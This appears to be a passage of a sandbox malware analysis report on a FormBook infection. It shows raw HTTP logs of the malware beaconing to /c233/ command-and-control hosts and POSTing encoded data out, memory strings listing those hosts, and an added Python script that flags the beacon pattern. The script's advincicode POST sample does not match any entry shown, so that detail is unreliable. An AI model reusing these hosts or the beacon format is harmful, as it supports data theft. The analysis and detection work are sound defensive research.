71 5f 71 6c 65 51 68 5a 69 49 55 50 72 48 39 6b 50 39 4b 73 67 51 43 48 79 77 55 78 64 53 4b 35 56 6f 31 2d 6b 39 69 74 64 4e 35 46 39 46 4f 75 74 77 50 70 6f 45 46 49 38 4e 54 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
jDHtm=FKHEmDVNcOFb~ZcYEAEA8Ctn6as_c4NLUE8iUESuH4tAL7(fsvPJ6xGC0Zcubhdd~M~LKGF-CDM5IDPa5TiKZw4dHPrzYZPwTuhydQheDmtvXBUpK0MjOn2L09Fs0TipaEF9e1iawhPADM79e0~HA7r4RRc9R1cVuuA0vskNZLmjX838mrgUNIhDoMRgXHLlIeITAzwBmJYt2Mq0ViCS5PJpka3EIUHuaSJ14CPi4ZLBEy8tAx2p0AWNMvcBxcyNau7kh_dCLDsn1t4WO6rzZZcm(MBE0huRdq~8Y_jX6wttm_AZVEsiM2DfBQWWP4KaNlTkbmKCgkPo(p5Cie20Kzq_qleQhZiIUPrH9kP9KsgQCHywUxdSK5Vo1-k9itdN5F9FOutwPpoEFI8NTA).
          Source: global trafficHTTP traffic detected: POST /c233/ HTTP/1.1Host: www.ecoapiaryfarms.comConnection: closeContent-Length: 185415Cache-Control: no-cacheOrigin: http://www.ecoapiaryfarms.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ecoapiaryfarms.com/c233/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 44 48 74 6d 3d 46 4b 48 45 6d 42 31 42 66 2d 49 64 36 72 49 5a 45 51 55 79 76 54 64 50 7e 59 6f 73 4d 66 67 36 5a 32 35 35 55 46 69 69 63 73 70 53 59 4c 76 66 71 74 6d 42 68 68 47 42 6a 70 63 74 52 78 5a 6c 69 4f 7e 44 4b 44 6c 45 43 44 45 34 43 6d 4c 62 34 44 6a 43 4c 41 45 68 4f 72 36 33 59 62 72 56 54 49 78 71 49 67 39 65 4f 32 46 70 4b 55 34 75 65 6c 41 38 51 6e 62 44 32 38 74 78 30 6a 4f 5f 61 6e 35 66 57 57 6d 59 68 69 54 4c 4e 6f 47 69 53 48 65 49 4f 4c 28 5f 65 32 30 55 66 33 34 52 6a 50 42 55 67 4a 63 4f 62 36 4f 39 53 38 48 30 69 61 31 69 65 6f 52 78 6f 4b 52 65 4e 43 4c 30 4d 66 55 68 4d 69 38 76 30 59 63 6a 7a 37 28 70 52 67 72 69 37 50 35 47 37 76 79 42 5a 58 43 75 4b 48 4e 66 32 43 6e 33 35 72 6a 46 4c 6e 51 5f 58 47 76 6b 37 6a 65 79 57 34 42 58 6a 4e 54 4f 55 4d 58 43 76 5f 63 73 4a 44 73 72 74 64 5a 6a 4b 4c 6a 34 65 59 74 45 32 76 68 78 31 77 44 52 61 6f 36 67 63 72 76 38 33 67 68 68 74 73 49 4c 66 47 41 54 64 45 66 5f 4f 77 57 5a 50 35 6d 52 4e 6c 54 53 62 6b 6a 6c 6d 56 4c 6f 7e 35 5a 52 76 66 32 34 49 7a 71 69 76 30 79 53 76 4b 32 59 55 50 6a 48 38 56 28 62 4b 64 6b 51 48 52 7e 7a 55 54 31 53 4c 70 56 6f 39 65 6c 71 79 5f 41 58 79 44 74 71 4f 38 67 33 62 5a 56 73 50 35 68 6f 41 54 5a 46 35 79 65 65 38 70 28 31 52 4c 69 39 34 78 4f 57 6f 31 72 4d 6a 38 37 52 70 5a 77 35 43 6a 34 39 61 53 39 75 65 31 59 55 38 51 52 69 49 6d 68 64 52 48 28 6f 49 5f 67 57 46 54 44 7a 70 74 6a 39 54 75 41 64 41 6d 28 72 55 78 36 37 54 58 44 62 49 58 42 7a 55 38 7e 57 7a 64 4f 69 73 43 43 4a 74 72 67 47 44 42 4e 63 46 76 
67 34 30 51 57 65 69 42 39 32 67 66 48 35 79 79 48 77 68 4d 65 6a 4c 62 74 43 4b 61 4d 70 63 4a 54 79 45 57 71 54 4c 75 44 5f 4a 4f 4b 5a 7a 57 50 47 4c 56 75 49 50 66 30 64 64 4a 52 54 6f 53 35 53 4c 31 56 65 47 39 37 4f 4a 71 58 44 41 57 7a 6f 71 51 65 36 42 4d 37 78 36 70 51 71 38 38 49 4a 31 58 39 45 48 65 6b 62 6d 4e 48 72 4f 4e 62 61 36 5a 4c 59 55 31 4b 73 55 5a 70 30 46 6c 4a 33 76 53 77 71 58 4c 77 33 66 32 6f 34 56 58 43 4b 54 73 6f 41 32 53 68 4b 55 69 69 59 4c 36 46 38 4c 54 4e 79 74 70 73 36 41 79 77 61 41 4c 77 68 59 4b 73 35 63 6e 4f 57 45 34 55 78 77 77 4d 41 61 48 66 72 75 57 53 79 69 6e 79 7a 4b 54 6f 75 33 63 54 46 6a 66 48 33 78 45 7e 7a 37 37 75 75 7a 6e 33 54 53 74 57 31 38 7a 4e 5a 6b 36 69 74 66 5a 7a 57 58 61 51 62 46 58 4b 48 73 67 63 65 58 57 57 33 54 44 41 31 55 41 38 57 55 39 39 39 59 4b 71 2d 37 39 75 2d 53 70 48 53 44 68 4d 47 51 6b 55 68 4f 38 55 5f 71 4b 45 4d 37 6f 59 31 52 31 36 75 71 42 6d 6f 66 76 35 76 73 32 56 59 49 2d 41 6f 45 50 6d 72 36 37 35 62 69 70 59 39 37 43 45 42 75 55
          Source: global traffic | HTTP traffic detected: GET /c233/?BZ=LhqLWrh8d&jDHtm=dIUL4aEnqVztNkxGFBfGGDue4kuBNJsB41nCN9+lFBZzP9N/eKcd9EC4aoHiD0dIecD5 HTTP/1.1
            Host: www.lumenhealthandwellness.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /c233/?jDHtm=Vp47q3jWYtxCpR5shwdOI9jgrSmWH0DOE+Ng17hSC+D0xjvv9TnN74PiV/E2XVvfy3Xi&BZ=LhqLWrh8d HTTP/1.1
            Host: www.affilexample6.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /c233/?jDHtm=rdruXmMsrmfjr75N4q96R5zwpwpkQvpMYoXExK0gOkKL6uUWfKzmipBUu891EQIUthqV&BZ=LhqLWrh8d HTTP/1.1
            Host: www.rupanaa.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /c233/?BZ=LhqLWrh8d&jDHtm=s9hIiY7EReOz2YwSLEQgOYezP1CImGsGkvwaaSfHWOStV9vruWPCpNUbWVdjWjx9llcz HTTP/1.1
            Host: www.henesymarte.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /c233/?BZ=LhqLWrh8d&jDHtm=P8W3Nhn/1wjuMbzQba9+Xkz0GoP3aEAwMmdFYv2f3Jxjf1tYZvWbX1Aq0R+IaCaFN+Nd HTTP/1.1
            Host: www.advincicode.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /c233/?jDHtm=clGH/XTlxIJgHxW4vaAZWA4KzODjpt9B0W6pMNoX4XRhNITn5jiOBWXD3dHeyDpJteiJ&BZ=LhqLWrh8d HTTP/1.1
            Host: www.glowtey.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /c233/?BZ=LhqLWrh8d&jDHtm=NoL+4mltcJVtmaVUQntK+GB5xrEZLMxxCS0mBWv5U5hjZvn1kv6Rpm3ggpYoYEtVjIy6 HTTP/1.1
            Host: www.ecoapiaryfarms.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: unknown | DNS traffic detected: queries for: www.lumenhealthandwellness.com
          Source: unknownHTTP traffic detected: POST /c233/ HTTP/1.1Host: www.affilexample6.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.affilexample6.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.affilexample6.com/c233/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 44 48 74 6d 3d 64 4c 30 42 30 51 72 78 57 63 45 7a 31 6d 6b 44 30 55 4e 56 51 59 37 7a 74 42 47 46 47 6e 72 77 64 71 49 78 78 4d 68 35 47 75 4c 6c 38 41 4b 5f 30 78 4b 6b 79 49 7a 69 48 70 41 6d 53 6d 36 4e 6a 53 72 62 55 32 58 44 53 59 6e 49 4b 71 64 5a 79 69 42 41 6e 47 72 45 36 74 55 45 59 30 4c 68 49 77 66 6a 33 45 68 4e 7e 56 51 36 32 56 35 32 53 65 56 4b 65 72 73 42 62 71 6c 49 38 54 31 75 68 42 70 64 4b 33 55 37 5a 30 65 53 67 5f 72 73 74 39 53 51 77 65 4b 4a 36 79 38 53 54 6d 47 41 39 34 6f 73 38 79 7e 4b 45 6c 4e 2d 79 78 48 61 4f 30 58 44 42 6d 6c 42 4d 64 43 70 7a 6a 42 4b 31 48 74 56 48 4c 44 41 4c 58 79 31 41 2d 77 74 4c 48 31 57 38 56 7a 65 42 45 67 72 6f 76 4d 5a 46 4e 31 61 59 42 78 4b 47 75 6e 46 6c 36 6b 6c 63 59 48 78 34 56 67 75 31 45 57 51 34 39 39 39 63 32 39 35 37 44 6c 38 6a 4f 64 76 71 69 6c 33 39 58 54 4d 77 6e 53 62 52 4d 68 74 74 78 54 55 4c 4b 6a 56 6d 76 50 54 68 7a 5a 43 47 32 49 79 79 73 5a 77 53 58 34 57 70 45 31 39 30 68 4f 57 6e 2d 6a 41 58 57 4f 62 58 50 69 45 6f 49 45 69 53 54 6a 75 67 47 78 37 6d 4b 66 73 68 4f 6e 53 51 77 66 4e 61 43 59 6c 28 62 68 62 4e 74 69 5f 41 30 79 67 37 76 59 59 38 58 28 4d 58 4d 47 5a 28 59 6d 63 54 71 33 6c 7a 47 4b 79 69 50 39 64 41 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
jDHtm=dL0B0QrxWcEz1mkD0UNVQY7ztBGFGnrwdqIxxMh5GuLl8AK_0xKkyIziHpAmSm6NjSrbU2XDSYnIKqdZyiBAnGrE6tUEY0LhIwfj3EhN~VQ62V52SeVKersBbqlI8T1uhBpdK3U7Z0eSg_rst9SQweKJ6y8STmGA94os8y~KElN-yxHaO0XDBmlBMdCpzjBK1HtVHLDALXy1A-wtLH1W8VzeBEgrovMZFN1aYBxKGunFl6klcYHx4Vgu1EWQ4999c2957Dl8jOdvqil39XTMwnSbRMhttxTULKjVmvPThzZCG2IyysZwSX4WpE190hOWn-jAXWObXPiEoIEiSTjugGx7mKfshOnSQwfNaCYl(bhbNti_A0yg7vYY8X(MXMGZ(YmcTq3lzGKyiP9dAg).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Sep 2020 07:32:33 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 23 Apr 2019 06:52:18 GMTAccept-Ranges: bytesContent-Length: 746Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 36 65 6d 3b 20 7d 20 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 47 65 6f 72 67 69 61 2c 20 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 34 61 34 61 34 61 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 65 6d 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 22 3e 0a 20 20 20 20 53 6f 72 72 79 2c 20 74 68 69 73 20 70 61 67 65 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 
68 65 20 55 52 4c 20 6f 72 20 67 6f 20 62 61 63 6b 20 61 20 70 61 67 65 2e 0a 20 20 3c 2f 68 31 3e 0a 20 20 0a 20 20 3c 68 32 20 73 74 79 6c 65 3d 22 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 37 64 37 64 37 64 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 22 3e 0a 20 20 20 20 34 30 34 20 45 72 72 6f 72 2e 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 0a 20 20 3c 2f 68 32 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>404 Error</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"> <style> @media screen and (max-width:500px) { body { font-size: .6em; } } </style></head><body style="text-align: center;"> <h1 style="font-family: Georgia, serif; color: #4a4a4a; marg
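The requests above share one shape: a short single-directory path (/c233/) requested on a sequence of unrelated hosts, GETs carrying two query parameters (one short token, one base64-looking blob of 68 characters) followed by seven NUL bytes, and POSTs with a fixed IE11 User-Agent, a Referer that is just Origin plus the path, and a single form field whose value uses a non-standard base64 alphabet and ends in ")." before trailing NULs. The 411-byte POSTs are followed by much larger 185415-byte uploads to the same hosts. The script below is an added example, not Joe Sandbox or FormBook code, that parses raw HTTP requests and scores them against those traits; its sample requests are reconstructed from the report's own entries (hex dumps omitted, query strings and the POST body taken from the "Data Ascii" rendering, Content-Length recomputed from the reconstructed body), plus one constructed benign control. The indicator names, the regex thresholds and the "three or more traits" cut-off are assumptions tuned to this sample, not a published signature.

```python
"""Flag the FormBook beaconing pattern seen in this report's HTTP traffic.
Added example, not Joe Sandbox or FormBook code: samples are reconstructed from
the report's GET/POST entries (hex dumps omitted, query strings and POST body
taken from the ASCII rendering, Content-Length recomputed); thresholds are
assumptions tuned to this sample, not a published signature."""
import re
from collections import defaultdict, namedtuple
from urllib.parse import urlsplit

HttpRequest = namedtuple("HttpRequest", "method target headers body")
# Static IE11 User-Agent carried by every POST in the report.
STATIC_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
SHORT_DIR_PATH = re.compile(r"^/[a-z0-9]{2,8}/$")       # e.g. /c233/
B64_BLOB = re.compile(r"^[A-Za-z0-9+/]{48,}={0,2}$")    # long GET parameter value
# POST body: one form field whose value uses letters, digits, '_', '~', '(', ')'
# and '-' (no '+', '/' or '=') and ends in ")." as every POST above does.
POST_BODY = re.compile(rb"^[A-Za-z]{3,8}=[A-Za-z0-9_~()\-]{64,}\)\.")

def parse_request(raw: bytes) -> HttpRequest:
    """Parse one raw HTTP/1.1 request (CRLF-delimited headers, optional body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, target, headers, body)

def indicators(req: HttpRequest) -> list:
    """List the FormBook-style traits one request exhibits."""
    found, url = [], urlsplit(req.target)
    if SHORT_DIR_PATH.match(url.path):
        found.append("short-dir-path")
    if req.headers.get("user-agent") == STATIC_UA:
        found.append("static-ie11-ua")
    if req.method == "GET":
        # Split by hand: parse_qsl would turn '+' inside the blob into a space.
        values = [p.partition("=")[2] for p in url.query.split("&") if p]
        if len(values) == 2:
            long_v, short_v = sorted(values, key=len, reverse=True)
            if B64_BLOB.match(long_v) and len(short_v) <= 16:
                found.append("two-param-get-beacon")
        if req.body and set(req.body) == {0}:
            found.append("trailing-nul-padding")   # the 7 NUL bytes after each GET
    elif req.method == "POST":
        if (req.headers.get("content-type") == "application/x-www-form-urlencoded"
                and POST_BODY.match(req.body)):
            found.append("single-field-custom-b64-body")
        if req.headers.get("referer") == req.headers.get("origin", "") + url.path:
            found.append("origin-self-referer")    # Referer is exactly Origin + path
    return found

def is_formbook_like(req: HttpRequest, threshold: int = 3) -> bool:
    return len(indicators(req)) >= threshold

def hosts_sharing_path(reqs, min_hosts: int = 3) -> dict:
    """Paths requested on several distinct hosts: FormBook walks its configured
    domain list with one fixed path, which a benign client rarely does."""
    by_path = defaultdict(set)
    for r in reqs:
        by_path[urlsplit(r.target).path].add(r.headers.get("host", ""))
    return {p: sorted(h) for p, h in by_path.items() if len(h) >= min_hosts}

def build_request(method, target, host, body=b""):
    """Assemble a raw request with the headers seen in the report (samples only)."""
    lines = [f"{method} {target} HTTP/1.1", f"Host: {host}", "Connection: close"]
    if method == "POST":
        origin = f"http://{host}"
        lines += [f"Content-Length: {len(body)}", "Cache-Control: no-cache",
                  f"Origin: {origin}", f"User-Agent: {STATIC_UA}",
                  "Content-Type: application/x-www-form-urlencoded", "Accept: */*",
                  f"Referer: {origin}/c233/", "Accept-Language: en-US",
                  "Accept-Encoding: gzip, deflate"]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1") + body

NUL7 = b"\x00" * 7   # trailing bytes the sandbox logged after each GET
# Constructed from the report: three GET beacons, one POST, and a benign control.
SAMPLES = [
    build_request("GET", "/c233/?BZ=LhqLWrh8d&jDHtm=dIUL4aEnqVztNkxGFBfGGDue4kuBNJsB41nCN9+lFBZzP9N/eKcd9EC4aoHiD0dIecD5", "www.lumenhealthandwellness.com", NUL7),
    build_request("GET", "/c233/?jDHtm=Vp47q3jWYtxCpR5shwdOI9jgrSmWH0DOE+Ng17hSC+D0xjvv9TnN74PiV/E2XVvfy3Xi&BZ=LhqLWrh8d", "www.affilexample6.com", NUL7),
    build_request("GET", "/c233/?jDHtm=rdruXmMsrmfjr75N4q96R5zwpwpkQvpMYoXExK0gOkKL6uUWfKzmipBUu891EQIUthqV&BZ=LhqLWrh8d", "www.rupanaa.com", NUL7),
    build_request("POST", "/c233/", "www.advincicode.com", b"jDHtm=HeaNTEf18jDLWIDRJKsiQjfpGZ3YTUR7cCE-KO3cm7tTPmN1dsbiRjdt3D6ldieNQedmIaXR2BkLafXGrResq83QpBBNZsAk4AJFeJQbswM5UoYKz3B5ig3QscUGpxP6OwE2OsBZrBj_H3MYYhBcTK7fJo~hlQ1qe10E7dxuIVIinqAIeNDwOzDBkL2B1GwcQxZ1pGuSKlQq70HEId55850WwkOCrjCUJFHufex1vESlkQaNVeiVOppZxhopt6Y0ueOpwxY3kooZsVCZZOJEdDBmEf99IMeiQLM3275QJRIVCKOr5KYsLrfD3LsUoyKFM-XuyHhIOCJIoBZ6xzO8gdoLIP5uYOtJ5LBvK6(5AtIDMrpmzL(G1wX0qp4lLBMpS0xxXq3ueO4msUhCHw).\x00dAg).\x00\x00"),
    build_request("GET", "/index.html", "www.example.com"),  # benign control, no beacon traits
]

def parsed_samples():
    return [parse_request(raw) for raw in SAMPLES]

if __name__ == "__main__":
    parsed = parsed_samples()
    for req in parsed:
        print(req.method, req.headers["host"], is_formbook_like(req), indicators(req))
    print(hosts_sharing_path(parsed))
```

Two caveats when reading the rest of the report with this in mind. The 404 returned by one host does not clear the traffic: FormBook's configured hosts include decoy or parked domains, so a "page not found" reply is the expected response from several of them, and the beacon shape, not the response code, is what matters. And of the URLs recovered from explorer.exe memory below, only those carrying the /c233/ path belong to the injected code; the fontbureau.com, carterandcone.com, founder.com.cn, jiyu-kobo.co.jp and similar URLs are licensing strings from font files already mapped in explorer.exe. The memory strings of the form http://hostA/c233/hostB line up with the order in which hosts were contacted (lumenhealthandwellness, affilexample6, rupanaa, henesymarte, advincicode, glowtey, ecoapiaryfarms), which is consistent with the sample walking a fixed list and skipping entries it cannot reach.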
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
          Source: model13.xml.0.dr | String found in binary or memory: http://gimp-print.sourceforge.net/xsd/gp.xsd-1.0
          Source: pagepanemaster.xml.0.dr | String found in binary or memory: http://mozilla.org/MPL/2.0/.
          Source: 111.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: 111.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: pagepanemaster.xml.0.dr | String found in binary or memory: http://openoffice.org/2001/menu
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.advincicode.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.advincicode.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.advincicode.com/c233/www.glowtey.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.advincicode.comReferer:
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.affilexample6.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.affilexample6.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.affilexample6.com/c233/www.pro-ecare.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.affilexample6.comReferer:
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.climpuright.icu
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.climpuright.icu/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.climpuright.icu/c233/www.smartlivegt.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.climpuright.icuReferer:
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp, cmd.exe, 00000008.00000002.729627797.0000000003C09000.00000004.00000001.sdmp | String found in binary or memory: http://www.ecoapiaryfarms.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp, cmd.exe, 00000008.00000002.729627797.0000000003C09000.00000004.00000001.sdmp | String found in binary or memory: http://www.ecoapiaryfarms.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.ecoapiaryfarms.com/c233/www.profitableadvisors.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.ecoapiaryfarms.comReferer:
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: nswBDB9.tmp.0.dr | String found in binary or memory: http://www.freedesktop.org/standards/shared-mime-info
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.gamelosophers.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.gamelosophers.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.gamelosophers.com/c233/www.indiankhedu.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.gamelosophers.comReferer:
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.glowtey.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.glowtey.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.glowtey.com/c233/www.ecoapiaryfarms.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.glowtey.comReferer:
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.gregorywise.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.gregorywise.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.gregorywise.com/c233/www.gamelosophers.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.gregorywise.comReferer:
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.henesymarte.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.henesymarte.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.henesymarte.com/c233/www.siyuechuanmei.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.henesymarte.comReferer:
